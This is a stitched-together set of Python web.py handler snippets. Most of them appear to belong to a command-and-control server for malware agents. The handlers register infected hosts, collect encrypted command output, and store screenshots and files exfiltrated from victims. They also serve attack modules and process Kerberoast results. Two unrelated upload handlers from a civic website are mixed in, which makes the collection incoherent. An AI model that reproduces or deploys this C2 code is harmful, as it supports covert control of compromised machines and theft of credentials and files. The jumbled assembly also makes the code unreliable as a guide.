def POST(self, id): data = web.data() if (config.AGENTS.get(id) != None and data != None): data = data.decode('base64') p_out = '[+] Agent (%d) - %s send Result' % (config.AGENTS[id][0], config.AGENTS[id][7]) print bcolors.OKGREEN + p_out + bcolors.ENDC print data
def uploadImage(self): if (len(self.request('qqfile')) > 100): log.info("*** == %s" % type(web.input()['qqfile'])) data = web.input()['qqfile'] else: data = web.data() imageId = ImageServer.add(self.db, data, 'giveaminute', [100, 100]) return imageId
def POST(self, id): data = web.data() if config.AGENTS.get(id) != None and data != None: data = data.decode('base64') fp = open('images/%s.jpg' % id, 'wb') fp.write(data) fp.close() p_out = '[+] Agent (%d) - %s send image(%s bytes)' % ( config.AGENTS[id][0], config.AGENTS[id][7], len(data)) print bcolors.OKGREEN + p_out + bcolors.ENDC return 'OK'
def POST(self, id): data = web.data() fn = id + ''.join( random.choice(string.ascii_lowercase) for i in range(5)) if config.AGENTS.get(id) != None and data != None: data = decrypt_file(AESKey, data.split(":")[1].split(":")[0]) fp = open('images/%s.png' % fn, 'wb') fp.write(data) fp.close() p_out = '[+] Agent (%d) - %s send image(%s bytes)' % ( config.AGENTS[id][0], config.AGENTS[id][7], len(data)) print bcolors.OKGREEN + p_out + bcolors.ENDC return 'OK'
def POST(self, id): data = web.data() if config.AGENTS.get(id) != None and data != None: filename = data.split("&")[0].split(":")[1] filecontent = data.split("&")[1].split(":")[1] filecontent = decrypt_file(AESKey, filecontent.strip()) fp = open('downloads/' + filename, 'wb') fp.write(filecontent) fp.close() p_out = '[+] Agent (%d) - %s send file(%s bytes)' % ( config.AGENTS[id][0], config.AGENTS[id][7], len(data)) print bcolors.OKGREEN + p_out + bcolors.ENDC return 'OK'
def POST(self, id): data = web.data() if config.AGENTS.get(id) == None and data != None: data = data.split('**') ip = web.ctx.ip data.insert(0, ip) data.insert(0, config.COUNT) config.set_count(config.COUNT + 1) p_out = '[+] New Agent Connected(%d): %s - %s\\%s' % ( config.COUNT - 1, ip, data[6], data[7]) print bcolors.OKGREEN + p_out + bcolors.ENDC config.AGENTS.update({id: data}) config.COMMAND.update({id: []}) config.TIME.update({id: time.time()}) return 'OK'
def POST(self, id): data = web.data() if config.AGENTS.get(id) != None and data != None: p_out = '[+] New Agent Request Module %s (%s - %s)' % ( data, config.AGENTS[id][0], config.AGENTS[id][7]) print bcolors.OKGREEN + p_out + bcolors.ENDC try: fpm = open('Modules/' + data, 'r') module = fpm.read() return module fpm.close() except Exception as e: print e return '' return 'OK'
def POST(self, id): data = web.data() if config.AGENTS.get(id) != None and data != None: #data = data.decode('base64') data = decrypt(AESKey, data) p_out = '[+] Agent (%d) - %s@%s\\%s send Result' % ( config.AGENTS[id][0], config.AGENTS[id][7], config.AGENTS[id][6], config.AGENTS[id][5]) history = file("c2-logs.txt", "a") history.write(p_out + "\n") history.write(data.replace("\00", " ") + "\n") history.close() if data.find("Defense_Ananylsis_Module") > -1: print data.find("Defense_Ananylsis_Module") fname = "DA/" + config.AGENTS[id][7] + "@" + config.AGENTS[id][ 6] + "DA_out.txt" da = open(fname, "w") da.write(data.replace("\00", " ")) da.close() server = threading.Thread(target=DA.main, args=(fname, )) server.start() return if data.find("Kerberoast-Module") > -1: print data.find("Kerberoast-Module") fname = "kerberoast/" + config.AGENTS[id][ 7] + "@" + config.AGENTS[id][6] + "_kerb_out.txt" k = open(fname, "w") k.write(data.replace("\00", " ")) k.close() server = threading.Thread(target=Kerberoast.kerb, args=( fname, config.AGENTS[id][7], config.AGENTS[id][6], )) server.start() return print bcolors.OKGREEN + p_out + bcolors.ENDC print data else: return 'REGISTER' return
def uploadFile(self): """ Handler for the /create/file endpoint. Looks for the variable named qqfile from the request and saves it to a file on the server. Return information about the file in a ``dict`` with keys ``id``, ``type``, and ``name`` """ file_info = {} # Get file from the request if (len(self.request('qqfile')) > 100): log.info("*** == %s" % type(web.input()['qqfile'])) file_name = '' data = self.request('qqfile') else: print web.input() file_name = self.request('qqfile') data = web.data() file_info['name'] = self.request('qqfile') or '' # Get a file server wrapper fs = S3FileServer(self.db) # Determine whether it's an image or another type of file media_type = file_info['type'] = self.getFileMediaType(data) # Upload the file to the server media_id = file_info['id'] = fs.add(data, file_name, make_unique=True) # If it's an image, upload the thumbnails as well if media_type == 'image': self.saveThumbnailImage(fs, media_type, media_id, data, 'small', self.SMALL_THUMB_SIZE) self.saveThumbnailImage(fs, media_type, media_id, data, 'medium', self.MEDIUM_THUMB_SIZE) self.saveThumbnailImage(fs, media_type, media_id, data, 'large', self.LARGE_THUMB_SIZE) return file_info